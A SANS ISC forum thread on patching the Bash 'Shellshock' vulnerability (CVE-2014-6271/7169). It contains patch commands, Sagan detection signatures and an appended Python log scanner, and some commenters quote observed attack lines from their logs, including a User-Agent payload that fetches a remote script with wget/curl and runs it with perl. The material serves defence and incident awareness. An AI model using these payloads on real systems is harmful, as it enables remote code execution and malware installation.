SANS ISC: Attention *NIX admins, time to patch! - Internet Security | DShield SANS ISC InfoSec Forums

Attention *NIX admins, time to patch!

Over the past years we have become used to Microsoft patches, the important, critical ones that leave your system fully vulnerable if you don't apply them. We have probably become so used to them that we sometimes forget that our Linux servers also need patches.

Today I learned about a critical Bash patch that addresses CVE-2014-6271. According to the advisory:

"A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue."

Patches are already available for most Linux distros, including Red Hat and Debian, so waste no time.

---

Pedro Bueno (pbueno /%%/ isc. sans. org)
Twitter: http://twitter.com/besecure

Pedro (ISC Handler)

The good news is that it's an easy fix:

Debian (Ubuntu, etc.): apt-get upgrade bash
RHEL (Fedora, CentOS, etc.): yum update bash
Jac

We've created the first batch of Sagan (log analysis engine - http://sagan.io) signatures to detect this. This monitors bash history and Apache logs for attempts. More information can be found at:

https://groups.google.com/forum/#!topic/sagan-users/Z8GEj20b0K4

Apache:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[APACHE] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; program: apache|httpd; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; parse_src_ip: 1; fwsam: src, 1 day; reference: url,wiki.quadrantsec.com/bin/view/Main/5002180; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002180; rev:2;)

Bash:

alert syslog $EXTERNAL_NET any -> $HOME_NET any (msg:"[BASH] Remote execution attempt via CVE-2014-6271"; content:"|28 29| { |3a 3b|}"; content: "HISTORY"; program: bash|-bash; classtype: exploit-attempt; flowbits: set, exploit_attempt, 86400; reference: url,wiki.quadrantsec.com/bin/view/Main/5002179; reference: url,web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271; sid:5002179; rev:1;)
Anonymous

Red Hat has become aware that the patch for CVE-2014-6271 is incomplete. An attacker can provide specially-crafted environment variables containing arbitrary commands that will be executed on vulnerable systems under certain conditions. The new issue has been assigned CVE-2014-7169.
https://access.redhat.com/articles/1200223
Anonymous

Red Hat provided an update indicating the patches are not complete and a new CVE has been assigned (CVE-2014-7169); more here:

https://access.redhat.com/articles/1200223
Anonymous

We've just started seeing scanning traffic using the following packet contents:

GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
User-Agent: () { :;}; /bin/ping -c 1 198.101.206.138
Accept: */*

This also appears to be using spoofed source IPs. No logs at this time.
sludge3000

You can't spoof a TCP payload. I've seen the above attacks from 89.207.135.125 which is (to me), obviously a host for malware sites and this sort of activity.

It seems to be a copycat of the 'Errata Sec' scans, which I feel are totally illegal too. (Breaking into a computer to run ping is bad, even if you say you're a security researcher. Wastes admins' time to follow up on the attack, and we also don't know who else the scan results are shared with / intercepted by).
Steven C.

Examples from my webserver log:

89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
109.202.102.224 - - [25/Sep/2014:08:55:16 -0700] "GET /cgi-bin/hello HTTP/1.0" 404 291 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\""

Shouldn't this rate setting the Threat Level to at least chartreuse?
John Hardin
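As an added example (not part of the thread, and not Sagan's code), here is a Python scan over Apache combined-format log lines that does what the Sagan Apache rule and John Hardin's log excerpt above illustrate: parse each line and flag client-supplied header fields whose value begins with the bash function-definition prefix "() {". It goes slightly beyond the Sagan rule by matching that prefix rather than the exact "() { :;}" bytes; the sample input is the first log line quoted above plus constructed lines.

```python
import re

# Apache "combined" format; quoted fields may contain backslash-escaped quotes.
_QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<request>' + _QUOTED + r')" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>' + _QUOTED + r')" "(?P<ua>' + _QUOTED + r')"$'
)

# Bash imports an environment variable as a function only when its value
# starts with "() {", so that prefix is the condition to alert on; matching it
# (not just the exact bytes "() { :;}") also catches spacing/body variants.
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')

# The two client-supplied header values the combined format records; a CGI
# handler exports them to the child as HTTP_REFERER and HTTP_USER_AGENT.
CLIENT_FIELDS = ("referer", "ua")

# Constructed sample: the first line is the one quoted in the thread, the
# rest are made up (one benign request, one probe via Referer, one junk line).
SAMPLE_LOG = [
    r'89.207.135.125 - - [25/Sep/2014:00:48:41 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 304 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"',
    r'192.0.2.10 - - [25/Sep/2014:09:01:02 -0700] "GET /index.html HTTP/1.1" 200 1024 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'198.51.100.7 - - [25/Sep/2014:09:02:03 -0700] "GET /cgi-bin/status HTTP/1.0" 200 50 "() { :; }; echo vulnerable" "curl/7.30.0"',
    r'not a log line at all',
]

def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    fields = m.groupdict()
    for key in CLIENT_FIELDS:
        fields[key] = fields[key].replace('\\"', '"')  # undo Apache's quote escaping
    return fields

def shellshock_hits(fields):
    """Names of the client-controlled fields whose value is a bash function definition."""
    return [key for key in CLIENT_FIELDS if SHELLSHOCK_RE.match(fields[key])]

def scan(lines):
    """Return (source IP, field name, payload) for every suspicious field in the log."""
    findings = []
    for line in lines:
        fields = parse_combined(line)
        if fields is None:
            continue  # unparseable line: skip rather than abort the whole scan
        for key in shellshock_hits(fields):
            findings.append((fields["ip"], key, fields[key]))
    return findings
```

Run `scan(SAMPLE_LOG)` to get the two probe lines back as (ip, field, payload) tuples; feed it `open("access.log")` for a real file.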